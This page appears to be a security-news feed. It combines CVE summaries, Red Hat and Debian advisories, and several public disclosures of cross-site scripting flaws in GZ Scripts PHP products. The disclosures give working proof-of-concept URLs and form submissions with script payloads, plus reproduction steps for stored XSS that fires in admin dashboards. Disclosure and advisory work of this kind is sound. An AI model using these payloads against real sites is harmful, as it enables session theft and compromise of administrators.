Unrestricted Upload of File with Dangerous Type in GitHub repository fossbilling/fossbilling prior to 0.5.3.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Limit "LIMIT" to numbers only + Disable upload theme (#1392)

\* Prevent non numeric values being used in limits

Potential abuse for Sql injection
Only allow integers to be used


Adjust exception

\* Disable upload assets via Theme pages

File upload was removed in an earlier PR

\* Make sure the test run fine

\* Fix the tests

\* Use limit instead of per\_page

\* And another fix

---------

Co-authored-by: Belle Aerni <belleaerni@gmail.com>

*   Loading branch information

CVE-2023-3491: Limit "LIMIT" to numbers only + Disable upload theme  (#1392) · FOSSBilling/FOSSBilling@2ddb743

 SQL Injection in GitHub repository fossbilling/fossbilling prior to 0.5.3.

CVE-2023-3490

Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed.
If a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.





CVE-2023-3485: Release v1.20.0 · temporalio/temporal

GZ Multi Hotel Booking System version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-multi-hotel-booking-system.html                   ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Multi Hotel Booking System 1.8                                          ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'adults' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2Path: /index.phpGET 'children' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2Path: /index.phpGET 'cal_id' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm[-] Done

GZ Multi Hotel Booking System 1.8 Cross Site Scripting

Red Hat Security Advisory 2023-3954-01 - This release of Red Hat Fuse 7.12 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, code execution, denial of service, information leakage, resource exhaustion, server-side request forgery, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Fuse 7.12 release and security update  
Advisory ID:       RHSA-2023:3954-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3954  
Issue date:        2023-06-29  
CVE Names:         CVE-2012-5783 CVE-2020-13956 CVE-2022-4492   
                   CVE-2022-24785 CVE-2022-31692 CVE-2022-36437   
                   CVE-2022-38398 CVE-2022-38648 CVE-2022-40146   
                   CVE-2022-41704 CVE-2022-41854 CVE-2022-41881   
                   CVE-2022-41940 CVE-2022-41946 CVE-2022-41966   
                   CVE-2022-42890 CVE-2022-42920 CVE-2022-45143   
                   CVE-2022-46363 CVE-2022-46364 CVE-2023-1108   
                   CVE-2023-1370 CVE-2023-20860 CVE-2023-20861   
                   CVE-2023-20883 CVE-2023-22602 CVE-2023-33201   
=====================================================================

1. Summary:

A minor version update (from 7.11 to 7.12) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.12 serves as a replacement for Red Hat Fuse  
7.11 and includes bug fixes and enhancements, which are documented in the  
Release Notes document linked in the References.

Security Fix(es):

* hazelcast: Hazelcast connection caching (CVE-2022-36437)

* spring-security: Authorization rules can be bypassed via forward or  
include dispatcher types in Spring Security (CVE-2022-31692)

* xstream: Denial of Service by injecting recursive collections or maps  
based on element's hash values raising a stack overflow (CVE-2022-41966)

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

* Apache CXF: SSRF Vulnerability (CVE-2022-46364)

* Undertow: Infinite loop in SslConduit during close (CVE-2023-1108)

* json-smart: Uncontrolled Resource Consumption vulnerability in json-smart  
(Resource Exhaustion) (CVE-2023-1370)

* springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
(CVE-2023-20860)

* spring-boot: Spring Boot Welcome Page DoS Vulnerability (CVE-2023-20883)

* jakarta-commons-httpclient: missing connection hostname check against  
X.509 certificate name (CVE-2012-5783)

* apache-httpclient: incorrect handling of malformed authority component in  
request URIs (CVE-2020-13956)

* undertow: Server identity in https connection is not checked by the  
undertow client (CVE-2022-4492)

* Moment.js: Path traversal in moment.locale (CVE-2022-24785)

* batik: Server-Side Request Forgery (CVE-2022-38398)

* batik: Server-Side Request Forgery (CVE-2022-38648)

* batik: Server-Side Request Forgery (SSRF) vulnerability (CVE-2022-40146)

* batik: Apache XML Graphics Batik vulnerable to code execution via SVG  
(CVE-2022-41704)

* dev-java/snakeyaml: DoS via stack overflow (CVE-2022-41854)

* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
(CVE-2022-41881)

* engine.io: Specially crafted HTTP request can trigger an uncaught  
exception (CVE-2022-41940)

* postgresql-jdbc: Information leak of prepared statement data due to  
insecure temporary file permissions (CVE-2022-41946)

* batik: Untrusted code execution in Apache XML Graphics Batik  
(CVE-2022-42890)

* Apache CXF: directory listing / code exfiltration (CVE-2022-46363)

* springframework: Spring Expression DoS Vulnerability (CVE-2023-20861)

* shiro: Authentication bypass through a specially crafted HTTP request  
(CVE-2023-22602)

* bouncycastle: potential  blind LDAP injection attack using a self-signed  
certificate (CVE-2023-33201)

* tomcat: JsonErrorReportValve injection (CVE-2022-45143)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

873317 - CVE-2012-5783 jakarta-commons-httpclient: missing connection hostname check against X.509 certificate name  
1886587 - CVE-2020-13956 apache-httpclient: incorrect handling of malformed authority component in request URIs  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing  
2144970 - CVE-2022-41940 engine.io: Specially crafted HTTP request can trigger an uncaught exception  
2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow  
2153260 - CVE-2022-4492 undertow: Server identity in https connection is not checked by the undertow client  
2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2155291 - CVE-2022-40146 batik: Server-Side Request Forgery (SSRF) vulnerability  
2155292 - CVE-2022-38398 batik: Server-Side Request Forgery  
2155295 - CVE-2022-38648 batik: Server-Side Request Forgery  
2155681 - CVE-2022-46363 Apache CXF: directory listing / code exfiltration  
2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability  
2158695 - CVE-2022-45143 tomcat: JsonErrorReportValve injection  
2162053 - CVE-2022-36437 hazelcast: Hazelcast connection caching  
2162206 - CVE-2022-31692 spring-security: Authorization rules can be bypassed via forward or include dispatcher types in Spring Security  
2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow  
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close  
2180528 - CVE-2023-20860 springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
2180530 - CVE-2023-20861 springframework: Spring Expression DoS Vulnerability  
2182182 - CVE-2022-41704 batik: Apache XML Graphics Batik vulnerable to code execution via SVG  
2182183 - CVE-2022-42890 batik: Untrusted code execution in Apache XML Graphics Batik  
2182198 - CVE-2023-22602 shiro: Authentication bypass through a specially crafted HTTP request  
2188542 - CVE-2023-1370 json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)  
2209342 - CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability  
2215465 - CVE-2023-33201 bouncycastle: potential  blind LDAP injection attack using a self-signed certificate

5. JIRA issues fixed (https://issues.redhat.com/):

ENTESB-20598 - Incomplete fix of CVE-2020-13956  
ENTESB-20598 - Incomplete fix of CVE-2020-13956  
ENTESB-21418 - CVE-2023-1370,  ensure that Syndesis is using fixed json-smart

6. References:

https://access.redhat.com/security/cve/CVE-2012-5783  
https://access.redhat.com/security/cve/CVE-2020-13956  
https://access.redhat.com/security/cve/CVE-2022-4492  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-31692  
https://access.redhat.com/security/cve/CVE-2022-36437  
https://access.redhat.com/security/cve/CVE-2022-38398  
https://access.redhat.com/security/cve/CVE-2022-38648  
https://access.redhat.com/security/cve/CVE-2022-40146  
https://access.redhat.com/security/cve/CVE-2022-41704  
https://access.redhat.com/security/cve/CVE-2022-41854  
https://access.redhat.com/security/cve/CVE-2022-41881  
https://access.redhat.com/security/cve/CVE-2022-41940  
https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2022-42890  
https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/cve/CVE-2022-45143  
https://access.redhat.com/security/cve/CVE-2022-46363  
https://access.redhat.com/security/cve/CVE-2022-46364  
https://access.redhat.com/security/cve/CVE-2023-1108  
https://access.redhat.com/security/cve/CVE-2023-1370  
https://access.redhat.com/security/cve/CVE-2023-20860  
https://access.redhat.com/security/cve/CVE-2023-20861  
https://access.redhat.com/security/cve/CVE-2023-20883  
https://access.redhat.com/security/cve/CVE-2023-22602  
https://access.redhat.com/security/cve/CVE-2023-33201  
https://access.redhat.com/security/updates/classification/#critical  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.fuse&version=7.12.0  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.12/

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ38aNzjgjWX9erEAQinAxAAok8XXaAwrRfOZy4j/osu5ZPTMpagKw0Q  
lf+XZ8a1F38yrVIxk7d48h04HBR865GIqAh5CrN0L9nrxGzkM6Dtiw43KzF3rXbd  
39ozCXv3y1JzRygzUM/RDv10s7kQAqAS9ZU1DWla0ALlcteOfKT98Ao8MAIhgrHg  
Ao+GtGN+jyVsIgfBkI7y6NoFmPG7OaPVg4F85Hq/uuOwg879CKkRIFWLFc8ziVtb  
QoouQ5Zdtb4wnhSqhzJq4pccKeSFXQG+uJV/OIlgMhbdGGkUOtcwX4CW8F584LiH  
ETBbkwnZfUF1FNo3sLRN942z4InkuLnqaX2TdT8wTaQCja1FW/O0Q7IfYTS9ESJ0  
xi06Rn3IeUoJCKIfeKrjI0f1dWqfHy11/TTNgANFbMRjlxJkNAN9nZLD5KdvzOp4  
1WfYTEsvuIaXchH/URDooI9BQ8m38kHogw/a9E/Qq4iXPRQtME7ANHfidCsuTq/9  
uYqOhuaqF82TMEmq2Y3P2D8RT5rnHFjjRbUvKbljzNBX2Co4CJ32zk3L1ol6GHZh  
rvnG1Tco9us8BbVHhSWaTSt3UOjf1eg1U9fhEijA8jR8tSf2Fw7c4e6dqU5kytVp  
ihK2fPpJ1HKqEm3gmPBEIYzSn7UxpjFMN1aZLRa5CZAD4p410Qg1zNX3BVLLI3zp  
vi0V6dxNE2g=  
=yKwR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3954-01

GZ E Learning Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-e-learning-platform.html                          ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ E Learning Platform 1.8                                                 ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/index.php/sxiqd"><script>alert(1)</script>ilec2?controller=GzUser&action=edit&id=5[-] Done

GZ E Learning Platform 1.8 Cross Site Scripting

CRM Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-crm-platform.html                                ││  Vendor   : GZ Scripts                                                                 ││  Software : CRM Platform 1.8                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'action' parameter is vulnerable to RXSShttps://website/index.php?controller=GzAdmin&action=dashboardpsrfg%3cscript%3ealert(1)%3c%2fscript%3ea4o1z&err=2[-] Done

CRM Platform 1.8 Cross Site Scripting

GZ Forum Script version 1.8 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://gzscripts.com/gz-forum-script.html                                 │  
│  Vendor   : GZ Scripts                                                                 │  
│  Software : GZ Forum Script 1.8                                                        │  
│  Vuln Type: Reflected XSS - Stored XSS                                                 │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│                                                                                        │  
│  Reflected XSS                                                                         │  
│                                                                                        │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
│                                                                                        │  
│  Stored XSS                                                                            │  
│                                                                                        │  
│  Allow Attacker to inject malicious code into website, give ability to steal sensitive │  
│  information, manipulate data, and launch additional attacks.                          │  
│                                                                                        │     
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

GET 'catid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a

Path: /preview.php

GET 'topicid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2

## Stored XSS

-----------------------------------------------  
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1

-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="free_name"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="topic"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325  
Content-Disposition: form-data; name="topic_message"

<script>alert(1)</script>  
-----------------------------39829578812616571248381709325--

-----------------------------------------------

POST parameter 'free_name' is vulnerable to XSS  
POST parameter 'topic' is vulnerable to XSS  
POST parameter 'topic_message' is vulnerable to XSS

## Steps to Reproduce:

1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)  
2. Inject your [XSS Payload] in "Name"  
3. Inject your [XSS Payload] in "Topic Title "  
4. Inject your [XSS Payload] in "Topic Message"  
5. Submit

4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on

5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)  
6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)

[-] Done

GZ Forum Script 1.8 Cross Site Scripting

Debian Linux Security Advisory 5441-1 - Two vulnerabilities were found in maradns, an open source domain name system (DNS) implementation, that may lead to denial of service and unintended domain name resolution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5441-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 29, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : maradnsCVE ID         : CVE-2022-30256 CVE-2023-31137Debian Bug     : 1033252 1035936Brief introduction Two vulnerbilities were found in maradns, an open source domain namesystem (DNS) implementation, that may lead to denial of service andunintended domain name resolution.For the oldstable distribution (bullseye), these problems have been fixedin version 2.0.13-1.4+deb11u1.We recommend that you upgrade your maradns packages.For the detailed security status of maradns please refer toits security tracker page at:https://security-tracker.debian.org/tracker/maradnsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSc6j4ACgkQO1LKKgqv2VSQLgf/Tn5pYOeHQDp4pK8nzpQ4FgIZkbxmsjvuzT3SEX637sDWz2hAfbeIWxjww0KbZnkdQIkPOWh6s5jZ3W4hvU7S+nhPjGiU88PXvGAyYItvU2QfaEXWzy4wwLBlPfuh8CiVJxREyvEk9sjZCGr/VqwQyY0ttYqbkpmx0cscm7MpdWBa7WsFFh19bNXUD3tWs0RPH0V5HNOwuBiay0uFh0V2o4PAssR8qaYeDfW2QQT5i1uf2wyW+Bq7IYUsxvMUKo3iRPQ9pX/nnpj0+ZyG/Mtn6tI8F0gMt/LS6LiAyQz/D7EdBguUJ56LZ/oniquCYAyAfnDwNRat66CEEpZpMXN0Xw===eb0N-----END PGP SIGNATURE-----

Debian Security Advisory 5441-1

GZ Hotel Booking Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-hotel-booking-script.html                     ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Hotel Booking Script 1.8                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZHotelBooking/load.php?controller=GzFront&action=booking_details HTTP/1.1first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&terms=1&date_range=29.06.2023+-+30.06.2023&date_to=30.06.2023&date_from=29.06.2023&adults=1&children=1&order=&sort=&fromNumber=&toNumber=&room_id%5B4%5D=1&room_id%5B3%5D=0&room_id%5B2%5D=0&room_id%5B1%5D=0&adults_arr%5B4%5D%5B1%5D=1&children_arr%5B4%5D%5B1%5D=1-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Room] for Booking2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)      [-] Done

Tag

#sql